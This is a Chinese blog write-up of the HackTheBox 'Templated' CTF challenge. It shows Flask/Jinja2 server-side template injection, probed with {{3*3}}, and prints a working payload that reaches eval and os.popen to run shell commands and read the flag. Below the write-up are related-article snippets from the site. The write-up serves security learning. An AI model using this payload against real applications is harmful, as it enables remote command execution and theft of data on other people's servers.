HTB-Templated

最新推荐文章于 2024-09-18 09:19:39 发布
最新推荐文章于 2024-09-18 09:19:39 发布
阅读量427 收藏 2
点赞数
分类专栏: # Web 文章标签: web安全 安全 flask 安全漏洞 靶机
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/galaxy3000/article/details/122678770
版权

文章目录

概述

HackTheBox 网站CTF靶场Web相关题目Templated,题目地址https://app.hackthebox.com/challenges/templated,考察Flask SSTI(服务器模板注入)漏洞的利用。

在这里插入图片描述

题目

题目概述

开启程序实例后,提示访问167.99.202.131:31954,访问http://167.99.202.131:31954,看到如下Web界面
在这里插入图片描述

提示很明确,使用了Flask和Jinja2,结合题目名称Templated,大概率为Flask SSTI漏洞,测试过程如下

首先访问http://167.99.202.131:31954/flag
在这里插入图片描述

接着访问http://167.99.202.131:31954/{{3*3}}
在这里插入图片描述

题目解答

SSTI利用代码如下

{% for c in [].__class__.__base__.__subclasses__() %}
{% if c.__name__=='_IterationGuard' %}
{{ c.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('cat flag*').read()") }}
{% endif %}
{% endfor %}

使用火狐浏览器的HackBar Quantum插件,拼接url,得到flag
在这里插入图片描述

galaxy3000
关注
专栏目录
Hack the Box——Templated (ssti) wp
maple's的博客
01-22 2885
0x00前言 刚做完第一题的我,立马打开了第二题 提示:Can you exploit this simple mistake?(您可以利用这个简单的错误吗?) 0x01访问网站 http://178.128.40.217:31440/ 从界面提示Proudly powered by Flask/Jinja2,首先盲猜是ssti漏洞 根据以往的经验首先找注入点 0x02 注入点 url尝试payload ?={{3*3}} 从这里明确是ssti漏洞,也找的注入点..
htb-beep
m0_55772907的博客
09-15 957
一般
templated-hielo-admin
08-21
bootstrap 后台模板
art-templated的使用
一枚不断学习的小码农一枚~
06-05 407
## art-template是什么art-template 是一个简约、超快的模板引擎。它采用作用域预声明的技术来优化模板渲染速度,从而获得接近 JavaScript 极限的运行性能,并且同时支持 NodeJS 和浏览器。## art-template 数据渲染方式### 1.引入art-template.js文件```js<script src="template-debug.js"&g...
设计模式-模板模式(Template)介绍和使用
旭东怪的博客
04-15 1890
目录 1模板模式(Template) 2 抽象Template类 3 具体Template类 3.1 TemplateA类 3.2 TemplateB类 3.3 TemplateC类 3.4 TemplateD类 4 调试代码 5 调试结果 注: 1模板模式(Template) 意图:定义一个操作中的算法的骨架,而将一些步骤延迟到子类中。模板方法使得子类可以不改变一个算法的结构即可重定义该算法的某些特定步骤。 主要解决:一些方法通用,却在每一个子类都重新写了这...
HTB-Bastion
2201_75378806的博客
05-15 971
它存储虚拟机(VM)硬盘的内容,其中可能包括磁盘分区,文件系统,文件和文件夹。它是 Libguestfs 项目的一部分,该项目提供用于访问和修改虚拟机 (VM) 磁盘映像的工具。SAM 文件是 Windows 安全基础结构的关键组件,用于系统上的本地身份验证。检查器是一个可以自动检测映像中有关操作系统和磁盘结构的信息的工具。然而,在备份中它们是可以访问的,因为它们没有“使用中”。:指定要访问的虚拟机磁盘映像的路径。在这种情况下,路径指向位于指定目录的VHD(虚拟硬盘)文件。:指定磁盘映像应以只读模式安装。
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
htb_challenges:为我所有过于复杂的htb挑战完成内容转储
03-27
htb_challenges 为我所有过于复杂的htb挑战完成内容转储
Metasploitable2靶机漏洞详解
12-11
Metasploitable2 虚拟系统是一个特别制作的ubuntu操作系统,本身设计作为安全工具测试和演示常见漏洞攻击。
HTB-Recon:Hackthebox计算机的自动侦查脚本(hackthebox.eu)
03-09
例如: ./htb-recon.sh 10.10.10.10. ServMon Windows ./htb-recon.sh 10.10.10.10. ServMon Windows 然后通过tmux a -t htb_recon附加会话 它能做什么 在您的主目录中创建一个工作区。 创建不同的文件夹以使事情...
HTB-Gen:脚本para gerar邀请de HackTheBox
03-29
HTB-Gen 脚本para gerar邀请de HackTheBox Windows / Linux Qualquer pessoa pode usar o script para fins lucrativos,para usar apenas tens abrir o teu Terminal / CMD dentro do diretorio do script depois...
Hack The Box——AI
江左盟的博客
02-28 937
目录 简介 信息收集 漏洞发现 漏洞利用 权限提升 总结 简介 这是一个比较有创意、考验脑洞的靶机(可能是我见识少),难度主要集中在漏洞发现部分。我按一般逻辑进行渗透,在发现文件上传点和两个文件(db.php和intelligence.php)之后,尝试绕过上传无果,只好借助强大的Google进行寻找思路了,原来是通过上传的wav音频文件进行SQL注入,然后获取用户名和密码通过SS...
Hack the Box——Wafwaf(代码审计) wp
maple's的博客
01-23 530
0x00前言 又开始了一天的学习之路打开了我的Hack the Box Wafwaf 提示:My classmate Jason made this small and super secure note taking application, check it out!(我的同学Jason制作了这个小型且超级安全的笔记记录应用程序,请查看!) 0x01访问网站 访问界面,简单明了,直接给了源码 http://167.99.88.216:30957/ 显然就是代码审计了 简单看下代码
新版HackTheBox做题记录(WP)
midi
04-19 3243
HTB(Hack the box)做题笔记WP Challenges:Web{Emdee five for life、Templated、Phonebook、FreeLancer、Gunship、Weather App} ,MISC{misDIRection、Blackhole、Eternal Loop、Longbottom's Locker、Canvas}
PCDN技术如何保障网络安全?(贰)
最新发布
ycwlkjyxgs的博客
09-18 615
通过上述措施的综合运用,可以有效提升PCDN技术的网络安全防护能力,保障网络的稳定运行和用户的合法权益。如果您对PCDN的技术特点、应用场景、市场竞争和成本投入有深入了解,并且认为它符合您的业务需求和市场定位,那么您可以考虑尝试PCDN。
ROS双线HTB流控配置手册:保障游戏体验
"ROS双线HTB操作手册" ROS双线HTB(Hierarchical Token Bucket,层次化令牌桶)是一种高级的流量整形技术,用于在RouterOS操作系统中实现精细化的网络带宽管理。此手册主要针对如何在双线环境中,如电信和联通线路...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值